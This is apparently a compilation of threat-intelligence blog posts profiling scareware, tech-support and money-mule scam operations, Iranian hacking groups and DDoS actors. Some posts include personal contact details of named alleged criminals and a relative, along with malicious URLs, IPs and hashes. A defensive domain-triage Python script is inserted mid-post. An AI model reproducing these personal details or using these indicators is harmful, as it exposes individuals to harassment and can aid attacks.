successfully empowering its operator with the necessary data
and expertise for the purpose of actively responding to global
cybercrime and jihad events.

• The third funding phase will consist of active purchase of
the following appliances: Kapow Software, Rosette appliance,
Systran appliance, Sentinel appliance, Palantir appliance.

In case you're interested in working with me for the purpose of
implementing this project including possible investor
introduction - I can be reached at dancho.danchev@hush.com

1. http://www.dia.mil/Business/Needioedia/ 

2. https://www.srf.or a/ 

2. 2019

2.1 January

Who's Behind BakaSoftware? - OSINT Analysis (2019-01-15 18:32)

Remember [1]BakaSoftware? The ubiquitous scareware-serving and
distributing money laundering scareware affiliate-based network
circa 2008? It appears that the time has come to expose the
actual individuals behind the campaign and the actual network.

In this analysis I'll discuss in depth the BakaSoftware
franchise circa 2008 including in-depth and personally
identifiable information on the cybercriminals behind it with
the idea to empower law enforcement and the security industry
with the necessary data and information that would eventually
lead to the prosecution and tracking down of the cybercriminals
behind BakaSoftware.

I can be reached at dancho.danchev@hush.com 

Personal Photo of Gavril Danilkin - Founder and CEO 
of BakaSoftware: 


Second Personal Photo of Gavril Danilkin - Founder 
and CEO of BakaSoftware:

Personally Identifiable Information regarding
Baka Software's Founder and CEO - Gavril Danilkin: 

Name: Gavril Danilkin 

Email: gavril@penza.net; fido@penza.net; 
doncapone@mail.ru; gav ril@sura.com.ru; 

Mobile Phone: 8412631806; 89023537746; 841251-06- 
02; 841256-49-45; 841276-06-93 

Skype: BakaDialer 

Web Site: http://penza-stroika.narod.ru 

BakaSoftware Social Network Visualization Graph 
courtesy of Maltego:

Personal Passport Photo of Gavril Danilkin's father
Danilkin Vasily Vasilyevich:

Second Personal Passport Photo of Gavril Danilkin's
father Danilkin Vasily Vasilyevich:

Malicious and Fraudulent Infrastructure
reconnaissance: 

hxxp://bakasoftware.com - 216.240.138.200 - Email: 
gavril@penza.net 

hxxp://nsl.bakasoftware.com - 216.255.189.139 Email: 
support@tobesoftware.com 

hxxp://tst.bakasoftware.com - 216.255.189.155 - Email: 
support@tobesoftware.com 

hxxp://bakasoftware.net - 208.88.227.36; 208.88.227.36 - 
Email: krab@thekrab.com 

hxxp://bakad ialer.com 

Personally Identifiable Information regarding 
BakaSoftware - TheKrab: 

Name: TheKrab 

Email: marck@gmail.com 

Phone: +7 012-225-5252 

Web site: http://smmprofi.ru/marck 

Personal Photo of a known BakaSoftware Gang 
Member known as - TheKrab:

Related Personal Photo of a known BakaSoftware
Gang Member known as - TheKrab:

It gets even more interesting to find out that BakaSoftware's
Gavril Danilkin is currently running a rogue and potentially
malicious rogueware and adware distributing affiliate-company
known as Zaxar Limited. Let's take the time and effort and
provide actionable intelligence on the infrastructure behind
the campaign.

Related Zaxar Ltd Information: 

Zaxar Limited 
P.O. Box 54922, 

Zip 3729, 

Limassol, Cyprus 

e-mail: secretary@zaxar.net 

Related malicious URLs known to have participated 
in the campaign: 




Fraudulent and malicious rogue network 
infrastructure reconnaissance: 

hxxp://zaxargames.com - 185.82.210.27; 185.82.210.24; 
185.82.210.30 

hxxp://zxrmedia.com - 185.82.210.5; 185.82.210.26; 
188.42.129.36; 185.82.210.29 

hxxp://zaxarstore.com - 185.82.210.24 

hxxp://zaxargames.com 

hxxp://zaxarsearch.com 

Related malicious MD5s known to have participated in the
campaign:


Related domains known to have participated in the 
campaign: 

Stay tuned! 

1. https://www.secureworks.com/research/rogue-antivirus-part-2

Exposing Iran's Most Wanted Cybercriminals - FBI Most Wanted
Checklist - OSINT Analysis (2019-01-16 11:09)

Remember my most recently published "[1]Assessing The Computer
Network Operation (CNO) Capabilities of the Islamic Republic of
Iran - Report"? The report details and discusses in-depth the
most prolific Iran-based government-sponsored and tolerated
hacking groups including the following groups:

- Ashiyane Digital Security Team 

- Iranhack Security Team 

- Iranian Datacoders Security Team 





- Iran Security Team a.k.a SEPANTA Team/Iran Cyber Army 2012/2013

- IDH Security Team 

- Bastan Security Team 

- NOPO Digital Security Team 

- Shekaf Security Team 

- Mafia Hacking Team 

- Iran Black Hats Team 

- Delta Hacking Security Team 

- Digital Boys Underground Team 

- Irlst Security Team 

I recently came across the [2]FBI's Most Wanted Cybercriminals
List and decided to elaborate more by providing actionable
Threat Intelligence on some of the most wanted Iranian
cybercriminals with the idea to help law enforcement and to
inform the security industry and to ensure that the
cybercriminals behind these campaigns can be properly tracked
down and prosecuted.

I can be reached at dancho.danchev@hush.com 

In this OSINT analysis I'll provide actionable intelligence
including personally identifiable information on some of FBI's
Most Wanted Iranian cybercriminals including [3]Ahmad Fathi,
[4]Hamid Firoozi, [5]Amin Shokohi, [6]Mohammad Sadegh
Ahmadzadegan, [7]Omid Ghaffarinia, [8]Sina Keissar, [9]Nader
Saedi including the infamous ITSec Team and the Mersad Co.
company.

Personally Identifiable Information regarding Sun Army Team
Members including ITSec Team and the Mersad Co. company:

Sun Army Team Members: 

Nitrojen26, Mehdy007, MagicCoder, tHe.Mo3tafA, Plus, 
BodyGuard 

Sample Network Infrastructure Reconnaissance:


hxxp://sun-army.org - 185.53.179.10 - Email: 

Sun.Army@asia.com; Lord.private@ymail.com 

Name: Omid Ghaffarinia 

Handle: Plus 

Email: omid.ghaffarinia@gmail.com; 

plus.ashiyane@gmail.com; 

omid.ghaffarinia@alum.sharif.edu 

Phone: 091 2444 9002 

Web 

Site: 

http://alum.sharif.ir/ 

omid.ghaffarinia/; 

http://alum.sharif.ir/ 

omid.ghaffarinia/; 

http://omidplus.persiangig.com/; 

Social 

Media 

Accounts: 

https://plus.google.com/109226633947780718251; 

https:/ 

/plus.googl- 



e.com/109226633947780718251 

Personal Photos of Omid Ghaffarinia a.k.a Plus: 
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Sample Personal Photos from a Train Trip: 
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Handle: MagicCoder 
Email: MagicC0d3r@gmail.com 
Web Site: http://magiccoder.ir 


Handle: Mehdy007 

Email: mehdy007@hotmail.fr 

Web Site: http://mehdy007.persiangig.com 

Sample Sun Army Cover Art Photos: 
ITSec Team a.k.a Amn pardazesh kharazmi a.k.a Pooya Digital Security Group Members:

Pejvak, M3hr@n.S, Am!rkh@n f Doosib, H4mid@Tm3l, 
R3dm0ve, Provider, ahmadbady 
Sample Team Member Personally Identifiable Information:


Name: Amin Shokohi 


Handle: Pejvak 

Email: pejv4k@yahoo.com 

Web Site: http://pejv4k.persiangig.com; 
http://pejv4k.110mb.com 

Handle: Mehr@n.S 

Email: M3hran.S@gmail.com 

Sample Network Infrastructure Reconnaissance: 

http://itsecteam.com/ 

Social Network Graph of Sun Army Team Members 
including ITSec Team Members and the Mersad Co. 
company: 
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Name: Mohammad Sagegh Ahmadzadegan 
Handle: Nitrojen26 

Email: nitr0jen26@asia.com; Nitrojen26@yahoo.com; 
me@sadahm.n et 

Web Site: hxxp://sadahm.com 

Social Media Accounts: https://twitter.com/nitrojen26 

Sample Personal Photos of Mohammad Sagegh 
Ahmadzadegan a.k.a Nitrojen26: 
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Sample Mersad Co. Company Logo: 

Sample Network Infrastructure reconnaissance: 
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hxxp://mersad.co/ - 188.40.112.196 
hxxp://mersadco.ir 

Mohammad's life has strongly tied with programming. After 
graduation of Computer Engineering, he studied IT 

(E-Commerce) for his Master to know more about the 
relation of business and technology. You can find some large 

scale software projects managed by him like Iran's SOC, 
SDIDS, Jolfa Vulnerability DB and etc. Now he is a university 

lecturer and also CEO of Mersad Co. and one of TKJ Co. 
consultants. Mohammad is here to help you how to manage 

a good develop team and guide you to have better usage of 
technology to achieve your business goals. 


Personal Photos of Mersad Co.CEO Mohammad 
Hamidi Esfahani: 
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Personally Identifiable Information regarding Mersad 
Co. Company CEO Mohammad Hamidi Esfahani: 

Name: Mohammad Hamidi Esfahani 

Email: 'm.hamidi.es@gmail.com 

Phone: 0913-304-7591 

Web Sites: http://www.mohammadhamidi.ir/ 
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Social Media Accounts: 

https://www.facebook.com/mohammad.hamidi; https://twit 
ter.com/haj _mamed; 

https://github.com/mohammadhamidi; 
https://medium.eom/@haj _mamed; 
https://medium.eom/@haj _mamed; 

https://plus.google.com/-i-mohammad hamidi Esfahani; 

Sample Mersad Co. Personal Company Photos: 
Stay tuned!

1. https://ddanchev.blogspot.com/2015/07/assessing-computer-network-operation_29.html

2. https://www.fbi.gov/wanted/cyber

3. https://www.fbi.gov/wanted/cyber/ahmad-fathi

4. https://www.fbi.gov/wanted/cyber/hamid-firoozi

5. https://www.fbi.gov/wanted/cyber/amin-shokohi

6. https://www.fbi.gov/wanted/cyber/mohammad-sadegh-ahmadzadegan

7. https://www.fbi.gov/wanted/cyber/omid-ghaffarinia

8. https://www.fbi.gov/wanted/cyber/sina-keissar

9. https://www.fbi.gov/wanted/cyber/nader-saedi
Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An Analysis (2019-01-16 16:03)

The Rise of Tech Support Scams? You wish.

The general availability of Tech Support Scams can be attributed to an overall increase in the standardization of fraudulent and rogue social engineering scams, which in turn can be largely attributed to the overall availability of affiliate-network type of fraudulent revenue-sharing schemes.

Keep reading.

Today's modern Tech Support Scam can be best described as a logical copycat evolution of the well-known Scareware, also known as Fake Security Software, a fraudulent and malicious monetization scheme affecting millions of users globally thanks to the overall availability of affiliate-network type of revenue-sharing schemes.
The key distribution and propagation tactics include spam and phishing campaigns, instant messaging, and black hat SEO, all largely relying on volume-based traffic acquisition for the purpose of converting the traffic into potential fraudulent customers and victims.

While the key traffic acquisition tactics remain the primary growth factor of the Tech Support Scam market segment, the key business model and "talent acquisition" tactics remain active outsourcing to custom-labeled call centers and data mining operators, together with the active use of brand-jacking, possibly typosquatting-based campaigns, and active visual social engineering campaigns.
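A defender-side triage sketch for the brand-jacking and typosquatting tactics described above, added here as an example and not code from the original post. It refangs hxxp-style indicators, flags hostnames that pair a watched brand (or a one-character look-alike) with a support lure, and groups numbered sibling domains; the brand watchlist, lure words, suffix set and sample hostnames are constructed assumptions.

```python
import re
from collections import defaultdict

# Assumptions for this example: a small brand watchlist mapped to the
# registrable domains treated as official, and a list of support-lure words.
BRANDS = {
    "yahoo": {"yahoo.com"},
    "microsoft": {"microsoft.com"},
    "windows": {"microsoft.com", "windows.com"},
    "apple": {"apple.com"},
    "norton": {"norton.com"},
}
LURES = ("support", "helpline", "helpdesk", "customer", "service",
         "alert", "error", "virus", "security", "activate")
# Simplified stand-in for the Public Suffix List.
TWO_LABEL_SUFFIXES = {"co.uk", "com.au"}

# Constructed sample indicators (reserved .example names, not from the page).
SAMPLES = [
    "hxxp://yahoocustomerservice[.]example/contact",
    "hxxp://yahoo.support-desk.example.co.uk",
    "https://help.yahoo.com/kb",
    "hxxp://micros0ft-helpline.example",
    "hxxp://pcalert-1[.]example",
    "hxxp://pcalert-2[.]example",
    "hxxp://pcalert-3[.]example",
    "blog.example",
]


def refang(indicator):
    """Turn a defanged indicator (hxxp://, [.]) into a bare lowercase hostname."""
    s = indicator.strip().lower().replace("[.]", ".")
    s = re.sub(r"^h(?:xx|tt)ps?://", "", s)
    return s.split("/")[0].split(":")[0].rstrip(".")


def registrable_domain(host):
    """Return the label directly under the public suffix plus that suffix."""
    labels = host.split(".")
    keep = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-keep:])


def edit_distance(a, b):
    """Levenshtein distance, used to spot one-character brand look-alikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(indicator):
    """Classify one hostname; returns (verdict, sorted list of reasons)."""
    host = refang(indicator)
    # A brand name under its own registrable domain is not brand-jacking.
    if any(registrable_domain(host) in official for official in BRANDS.values()):
        return "official", []
    reasons = set()
    tokens = [t for t in re.split(r"[^a-z0-9]+", host) if t]
    for brand in BRANDS:
        if brand in host:
            reasons.add("brand:" + brand)
        elif any(edit_distance(tok, brand) == 1 for tok in tokens):
            reasons.add("lookalike:" + brand)
    reasons.update("lure:" + word for word in LURES if word in host)
    has_brand = any(r.startswith("brand:") for r in reasons)
    has_lure = any(r.startswith("lure:") for r in reasons)
    if any(r.startswith("lookalike:") for r in reasons):
        verdict = "typosquat"
    elif has_brand and has_lure:
        verdict = "brand-jacking"
    elif has_brand or has_lure:
        verdict = "review"  # one weak signal only; needs an analyst's look
    else:
        verdict = "no-match"
    return verdict, sorted(reasons)


def serial_clusters(indicators, minimum=3):
    """Group hosts that differ only by a number, a sign of bulk registration."""
    groups = defaultdict(list)
    for indicator in indicators:
        host = refang(indicator)
        groups[re.sub(r"-?\d+", "", host)].append(host)
    return {k: sorted(v) for k, v in groups.items() if len(v) >= minimum}


if __name__ == "__main__":
    for sample in SAMPLES:
        print(refang(sample), *assess(sample))
    print(serial_clusters(SAMPLES))
```

Substring matching keeps the sketch short but will also flag unrelated names that merely contain a brand string, so its output is a triage queue rather than a blocklist.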

Are Tech Support Scams making a comeback? How can we best proceed to estimate the true cost of Tech Support Scams and gather the associated actionable threat intelligence? Keep reading!

In this Intelligence brief I'll provide actionable intelligence on a diverse portfolio of Fake Tech Support scam domains and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it, with the idea to successfully disrupt and shut down the rogue operations related to this particular Intelligence brief.

Sample portfolio of fake and fraudulent Tech Support Scam phone numbers:

Sample portfolio of Fake Tech Support Scam Domains:

Sample screenshots of fake tech support pages: Yahoo Phone Number Support; Computer Repair Services USA; Support for MSN Billing

Stay tuned for the updated portfolio of Fake Tech Support 
Scams to be published anytime soon! 
The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compromise - An Open Letter to the U.S Intelligence Community (2019-01-24 19:25)

I recently came across the most recently published [1]DoD Cyberspace Strategy 2018, which greatly reminded me of a variety of resources that I recently took a look at in terms of catching up with some of the latest cyber warfare trends and scenarios. Do you want to be a cyber warrior? Do you want to "hunt down the bad guys"? Watch out - Uncle Sam is there to spank the very bottom of your digital irrelevance. How come?

It appears that the U.S is reclaiming dominance over the "communication channel" using a variety of real-life oriented cyber threats, including referencing and citing security researchers and NGOs (Non-Profit Organizations) as potential threats. Takes you back - doesn't it? If it's going to be massive it better be good.

It's been several years since I last posted a quality update following my [2]disappearance and possible kidnapping attempt circa 2010. What really took place during that period of time? The rise of ransomware? The rise of Tech Support Scams? Yet another botnet currently spreading In The Wild? A market-driven buzz-word generation?


Take that - ransomware is there to take care, hundreds of thousands of supposedly relevant IOCs (Indicators of Compromise) and TTPs (tactics, techniques and procedures) discussed to the bottom of your PR-relevant online presence.

The Rise of the Threat Hunter job career opportunity basically empowering you with the almighty skills to "track down" and "shut down" the bad guys? You wish - Uncle Sam is always there to take care.

Let's discuss the Threat Intelligence market segment and offer an in-depth discussion on its inner workings, including a possible discussion on the Threat Intelligence market segment in today's modern Intelligence Community successfully realizing the consequences of what was once a proprietary network known as the Internet - today's modern cyber warfare operational battlefield.

Many of my blog readers are familiar with my work throughout the years; however, what you might not be aware of is the fact that throughout the 90's I used to pioneer the position of Technical Collector in the context of processing hundreds of malicious and user-friendly Trojan Horses, also known as Remote Backdoors, which would later be described as Remote Access Tools, through my hacker enthusiast years as an independent contractor and novice hacker working with the market-leading LockDownCorp anti-trojan horse software, leading to what would later be better described as the foundations of the Threat Intelligence market's qualitative Technical Collection, including the very basics of the foundations of CYBERINT.

Let's discuss in depth the current state of the Threat Intelligence market segment, including an in-depth discussion on the Threat Intelligence market segment in the context of today's modern U.S Intelligence Community.

• Indicators of Compromise - the very basics of formulating a new buzz-word for what was once a proprietary term coined by the Intelligence Community to populate and disseminate actionable nation-state Cyberspace data to a variety of defensive and offensive Cyber Warfare Units can be best described as a New Age in the area of responsive and proactive OSINT type of acquisition methodologies, that is, a new way to acquire leaked data and potential data-and-resource exposure in a variety of automated ways. Generalizing the very basics of the Threat Intelligence market segment, potential Indicators of Compromise leaks can be best tackled by offering central repositories with "government-free" access, including a nation-state Early Warning System for potential Cyberspace threat data, including a variety of Indicators of Compromise, to prevent wide-spread data and information leaks, further protecting the U.S Government from current and emerging threats.

• Corporate Sector Data Mining Should Be Considered - what was once best known as "conducting cyber espionage through botnets", including the conducting of "cyber espionage through data mining of malware-infected corporate networks", can be best described as today's proposed central Incident Response based central repository empowering the U.S Intelligence Community with the necessary data and expertise to stay ahead of and act upon current and emerging cyber threats.

• Private Sector Cooperation and the "You Wish" mentality - the general assumption that the private sector will continue to cooperate and empower the U.S Intelligence Community with the necessary data, information and knowledge should be considered a wrong approach on the U.S Intelligence Community's way to further protect the U.S national infrastructure, including the proactive response to current and emerging cyber threats. What can be best done to further protect the U.S Government from current and emerging threats can be best described as a modern central repository of "government-free" access based Cyber Threat Data type of platform.

• Slicing the Threat on Pieces Should be Ignored - What can be best described as the process of slicing the threat "on pieces" is today's modern World of PR agencies and Threat Intelligence market segment intermediaries, including the active labeling of a particular group of interest or an individual as a separate entry, leading to overall confusion in the context of actually providing actionable Threat Intelligence to the U.S Intelligence Community that could ultimately better protect the U.S National Infrastructure. With the mainstream media continuing to raise the buzz around popular terms and newly coined cyber threat actor groups in the face of the rise of the advanced persistent threat media-buzz generating initiative, it should be clearly noted that labeling a specific cyber threat actor in the public domain should be considered an irrelevant exercise in the broad context of providing the U.S Intelligence Community with the necessary data, information and knowledge to stay ahead of current and emerging cyber threats.

• Tactics Techniques and Procedures Should Be Buzz-Word Ignored - The very basics of coining a term for the purpose of describing what can be best described as a general cyber threat methodology known as qualitative assessment should be considered as a possible flag raising operation and as a possible source of confusion in terms of the broader context of discussing and reacting to current and emerging cyber threats.

• The Rise of the "Threat Hunter" Cyber Security Career Position Is Already Causing Headaches - The rise of the "Threat Hunter" career position can be best described as a complete failure to understand the basics that drive today's modern Cyber Warfare Team, including possible defensive and offensive Cyber Warfare Units and Cyber Operations Groups. With everyone "interested" in becoming a Cyber Warrior, including a possible "Threat Hunter", it should be noted that the over-supply of private-sector companies stealing revenue from Uncle Sam for the purpose of enriching and disseminating actionable Threat Intelligence is increasing, resulting in the overall demise of what was once a proprietary technology and know-how in the hands of a few that truly grasped the market and its potential, successfully serving the needs of the U.S government for years to come.

• The Rise of Secondary Markets for IOCs Should Provide "Government-free" Access - The general over-supply of market-segment driven repositories of actionable Threat Intelligence data should be greatly attributed to a variety of factors, including the rise of the Threat Intelligence market segment, and should be considered as a way for the U.S Intelligence Community to clearly seek a technical and potentially market-segment relevant way to populate a potential Cyber Threats database using public and proprietary sources with a clear "government-free" access in mind.

Current Proposals to U.S Intelligence Community in Terms of Threat
Intelligence and Nation-State Actors:

• Ousted Activity - Taking into consideration the fact that on the
majority of occasions the majority of quality Threat Intelligence type
of data is publicly obtainable using a variety of public and
potentially proprietary sources it should be considered feasibly
possible for the U.S Intelligence community to build, manage and
operate a proactive-based Cyber Threats anticipating platform including
a possible Early Warning Based type of OSINT-capable system able to
anticipate and act upon current and emerging threats with a possible
cluster-based type of data mining and information processing
capabilities potentially serving the needs of the U.S Intelligence
Community.

• Government-free Access - The very notion that an Indian-based company
will successfully manage, launch and operate a Threat Intelligence
business should be largely ignored for the very sake of figuring out a
way to obtain access to a particular company's Threat Intelligence
data, information and knowledge citing potential National Security
issues. What should be considered in terms of obtaining access to a
company's data-base citing potential National Security issues is the so
called notion of "government-free" access based type of private sector
partnership.

• Talent Acquisition Roles - In today's modern Talent Acquisition Wars
it should be clearly noted that a select set of key individuals can
greatly contribute to the overall demise of cybercrime internationally
taking into consideration the overall demise of the "Wisdom of the
Crowds" market-segment driven-concept. What should be considered when
hiring a potential top-notch Cyber Warfare and Information
Warfare-based type of personnel shouldn't necessarily be years and
decades worth of experience but the overall disruptive degree of the
individual in terms of "making a change" and "making an impact"
compared to a certification-based-driven crowd of individuals.

• Central Repository - What the modern U.S Intelligence Community can
do to better protect the nation's Infrastructure should be considered
as something along the lines of a central-private-sector driven
repository of Threat Intelligence type of data including the notion of
a "government-free" access in terms of obtaining access to a public or
a proprietary company's information and data assets.

1. https://fas.org/irp/doddir/dod/jp3_12.pdf

2. https://ddanchev.blogspot.com/2018/10/dancho-danchevs-2010-disappearance.html

Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping
Panel LLC" Scam Domain Portfolio Spotted in the Wild (2019-02-07 10:14)

The time has come to profile a recently intercepted and currently
active malicious and fraudulent re-shipping money mule recruitment
campaign successfully enticing users into interacting with the rogue
and bogus content, potentially risk-forwarding the risk of the
fraudulent transaction to the unsuspecting user.

Sample malicious URL:

hxxp://yourshippingpanel.com

Sample Mailing Address:

One World Trade Center, New York, NY, 10007, USA

+1 (606) 879-0046

Sample Company Description:

"Your Shipping Panel LLC" is successfully positioning the company
"Founded in 1995, is a package delivery company with services to
Eastern Europe as well as to all the countries of the former Soviet
Union. Over the years, Your Shipping Panel LLC has grown into an
industry leader by focusing on the goal of connecting customers in the
United States with their families, friends and businesses in Eastern
Europe. This also includes e-commerce between those countries. Today,
Your Shipping Panel LLC has become a dominant force in package delivery
with services to Ukraine, Russia, Belarus, Moldova, Uzbekistan,
Kazakhstan, Kyrgyzstan, Georgia, Azerbaijan and Armenia. Our
specialized transportation and logistics services to those countries
lead the way as the most recognized brand in North America."

Sample Screenshots of The Related Web Sites Known 
to Have Been Involved in the Campaign: 

Related domains known to have participated in the campaign:

Stay tuned for an additional portfolio of re-shipping money mule
recruitment scam domains to be published anytime soon.

Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment
Scam Spotted in the Wild (2019-02-07 10:51)

Continuing the series of posts detailing the activities of currently
circulating malicious and fraudulent spam campaigns successfully
targeting potential money mule recruiters I've recently come across
Global Postal Express which basically:

"We Provide best in service global logistics through our people by
building lasting relationships with the commitment to prioritize our
customer needs to generate financial results. Be the leader in the
development of integrated logistics strategies by offering the highest
levels of quality, reliability and exceptional customer service while
strategically growing nationally and internationally"


Sample malicious URL known to have participated in the campaign:

hxxp://globalpostalexpress.net - Email: globalpostalexpressinc@gmail.com

Sample Mailing Address:

2549 Harris Ave, Sacramento, CA 95838, U.S.A
+1 (719) 838 2416

Sample Screenshots of the Service in Action: 

Sample Screenshots of the Related Malicious Domains Known to Have
Participated in the Campaign:

Related malicious URLs known to have participated in the campaign:

hxxp://www.marannata.com
hxxp://wellburton.com
hxxp://stecoexpress.com
hxxp://mag-trading.com

Stay tuned for an additional set of details regarding re-shipping money
mule recruitment domain portfolios anytime soon.

Historical OSINT - Able Express Courier Service Re-Shipping Mule
Recruitment Scam Spotted in the Wild (2019-02-07 12:14)

I've recently intercepted a currently circulating malicious and
fraudulent spam campaign successfully impersonating "Able Express
Courier Service" to utilize a re-shipping mule recruitment scam
potentially targeting tens of thousands of unsuspecting users globally.

Sample malicious URL known to have participated in the campaign:

hxxp://ablecs.biz - 104.31.82.184 - Email: phyllisjhurst@grr.la

Sample Mailing Address:

PO Box 34459
Bartlett, TN 38184-0459
United States
+1 (888) 597-5808

The service is positioning itself as "Able Express Courier Service has
been providing forwarding services for more than three years now. Our
staff consists of experienced professionals who regularly get certified
and verified for competency. Over the years, Test Com pant inc has
delivered packages to a variety of places and gained many major
business partners all around the world."

Sample Screenshots of the Malicious and Fraudulent 
Service: 

Stay tuned for an additional set of details regarding re-shipping money
mule recruitment scams to be published anytime soon.

Historical OSINT - Profiling a Typosquatted Facebook and Twitter
Impersonating Fraudulent and Malicious Domains Portfolio
(2019-02-07 15:47)

With cybercriminals continuing to populate the cybercrime ecosystem
with hundreds of malicious releases including a variety of typosquatted
domains it shouldn't be surprising that hundreds of thousands of users
continue falling victim to fraudulent and malicious malware and
exploits serving schemes.

In this post I'll profile a currently active fraudulent and malicious
typosquatted domain portfolio successfully impersonating Facebook and
Twitter for the purpose of enticing users into interacting with the
rogue and malicious domains.

Related domains known to have participated in the 
campaign: 


Stay tuned for an updated set of typosquatted malicious and fraudulent
domains impersonating popular brands to be published anytime soon.

Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of
OEM-Pirated Software (2019-02-07 17:27)

In a cybercrime-ecosystem dominated by fraudulent and malicious
releases cybercriminals continue relying on fraudulent and
potentially-malicious affiliate-based type of revenue-sharing schemes
for the purpose of serving fraudulent and malicious software to
thousands of unsuspecting users including OEM-powered pirated software
to millions of users globally.

In this post I'll profile a currently active fraudulent and malicious
domain portfolio of OEM-powered pirated-software serving fraudulent and
malicious domains.

Related domains known to have participated in the 
campaign: 


With software piracy continuing to increase and proliferate it
shouldn't be surprising that rogue and fraudulent affiliate-based type
of networks will continue to make impact globally potentially exposing
millions of users to a variety of risks including malicious software.

Stay tuned for an updated set of fraudulent and malicious piracy-themed
portfolio of domains to be published anytime soon.

Historical OSINT - A Peek Inside The Georgia Government's Web Site
Compromise Malware Serving Campaign - 2010 (2019-02-07 17:30)

Remember the massive [1]Russia vs Georgia cyber attack circa 2009? It
seems that the time has come for me to dig a little bit deeper and
provide [2]actionable intelligence on one of the actors that seem to
have participated in the campaign including a sample Pro-Georgian type
of Cyber Militia that apparently attempted to "risk-forward" the
responsibility for waging Cyberwar to third-parties including Russian
and Anti-Georgia supporters.

How come? In this post I'll provide actionable intelligence on what
appears to be a currently active Brazilian supporter of the Cyber
Attacks that took place circa 2009 with the idea to discuss in-depth
the tools and motivation for launching the campaign of the
cybercriminals behind it.

Sample malicious URL known to have participated in the campaign:

hxxp://geocities.ws/thezart/

It's 2010 and I'm coming across a malicious and fraudulent file
repository that can be best described as a key actor that managed to
participate in, perhaps even orchestrate, the Russia vs Georgia cyber
attacks circa 2009. Who is this individual? How did he manage to
contribute to the Russia vs Georgia cyber attacks? Did he rely on
active outsourcing or was he hired to perform the orchestrated DDoS for
hire attacks that took place back then? Keep reading.

It appears that a Brazilian user known as The Zart managed to
participate in the Russia vs Georgia cyber attacks circa 2009 relying
on a variety of tools and techniques known as:

- DNS Amplification Attacks

- Web Site Defacement Tools

- Targeted Spreading of Vulnerable Legitimate Web Sites

- Automated Web-Site Exploitation - Long Tail of The Malicious Web

which basically resulted in a self-mobilized militia that actually
participated and launched the Russia vs Georgia cyber attacks circa
2009.

Related posts:

[3] The Russia vs Georgia Cyber Attack

[4] Who's Behind the Georgia Cyber Attacks?

[5] DDoS Attack Graphs from Russia vs Georgia's Cyberattacks

[6] Real-Time OSINT vs Historical OSINT in Russia/Georgia Cyberattacks

1. http://georgiaupdate.gov.ge/doc/10006922/CYBERWAR-%20fd_2_.pdf

2. http://blog.sucuri.net/2010/02/georgia-government-sites-hacked-and.html

3. https://ddanchev.blogspot.com/2008/08/the-russia-vs-georgia-cyber-attack.html

4. https://ddanchev.blogspot.com/2008/08/who-behind-georgia-cyber-attacks.html

5. https://ddanchev.blogspot.com/2008/10/ddos-attack-graphs-from-russia-vs.html

6. https://ddanchev.blogspot.com/2008/10/real-time-osint-vs-historical-osint-in.html

Historical OSINT - Profiling a Portfolio of Fake Visa Application Scam
Domains (2019-02-07 17:56)

It's been a while since I last posted a quality update profiling a
versatile currently circulating malicious and fraudulent spam campaign
profiling and highlighting the fraudulent and malicious activities of
the cybercriminals behind the campaign.

In this post I'll profile a currently circulating Fake Visa Application
fraudulent campaign enticing users into submitting their personal
details for the purpose of obtaining a fake and rogue visa.

Related emails known to have participated in the campaign:


Stay tuned for an updated set of malicious and fraudulent Fake Visa
Application domain portfolio to be published anytime soon.

Historical OSINT - Sub7 Crew Releases New Version on 11th Anniversary
of The RAT (2019-02-07 18:03)

It's 2010 and I've recently come across the following announcement at
Sub7's Main Forum - the most ubiquitous trojan horse also known as
Remote Access Tool circa the 90's - on the upcoming release of a new
version.

"People can buy unique FUD servers in the shop and custom clients can
also be written to help you admin PC's remotely with your own features.
These are selling well so be sure to grab your own custom version while
we are offering them at this price. Please be advised there is
currently a waiting list for this."

Sample detection rate:

- [1]borlndmm.dll - Result: 0/42 (0 %)

- [2]EditServer.exe - Result: 10/42 (23.81 %)

- [3]Server.exe - Result: 18/41 (43.91 %)

- [4]SubSeven.exe - Result: 16/41 (39.03 %)

Should The Scene the way we know it re-appear the way we know it? It
appears that every now and then a new cybercrime-friendly tool is
trying to materialize taking us back to what used to be The Scene circa
the 90's.

1. https://www.virustotal.com/bg/file/23b0241109dea46fcd433d25a48e41f95cf2d7ea589f72f4e2948706de3e0657/analysis/

2. https://www.virustotal.com/bg/file/35e843125f2ef10925c856a0a39000a8df368fb8499cd0d47d12b5de728a222c/analysis/

3. https://www.virustotal.com/bg/file/2ba3217268b2d737a542e7b7840a4480c655b2b9414d4c57e8b1c8bfa76322c8/analysis/

4. https://www.virustotal.com/bg/file/0d0d9ba70ab502cd1a61d0913ae9e9853131079e22881a2f527bf699029824ad/analysis/

Historical OSINT - "I Know Who DDoS-ed Georgia and Bobbear.co.uk Last
Summer" (2019-02-07 20:30)

Appreciate my rhetoric. In this post I'll provide actionable
intelligence on a key DDoS for hire service that was primarily used in
the [1]Russia vs Georgia Cyber Attacks circa 2009 including the [2]DDoS
attack against Bobbear.co.uk.

Related actionable intelligence on the campaign:

hxxp://setx.in - Email: info@antiddos.eu - setx.mail@gmail.com -
hxxp://httpdoc.info - hxxp://fakamaza.info. The last one with the email
address "team@russia-vs-georgia.org" in the WHOIS info.

Related malicious URLs known to have participated in the campaign:

hxxp://cxim.inattack.ru/www7/www/auth.php

Related malicious URLs known to have participated in the campaign:

hxxp://h278666y.net/main/load.exe
hxxp://h278666y.net/www/auth.php

Related malicious MD5s known to have participated in the campaign:

MD5: 34413180d372a9e66d0d59baf0244b8f
MD5: 42e4bbd47d322ec563c86c636c3f10b9
MD5: ed36b42fac65236a868e707ee540c015
MD5: c9fa1c95ab4ec1c1d46abe5445fb41e4
hxxp://cxim.inattack.ru/www3/www/
hxxp://i.clusteron.ru/bstatus.php

Related malicious URLs known to have participated in the campaign:

hxxp://svdrom.cn

Related malicious URLs known to have participated in the campaign:

hxxp://203.117.111.52/www7/www/getcfg.php

Related malicious domains known to have 
participated in the campaign: 


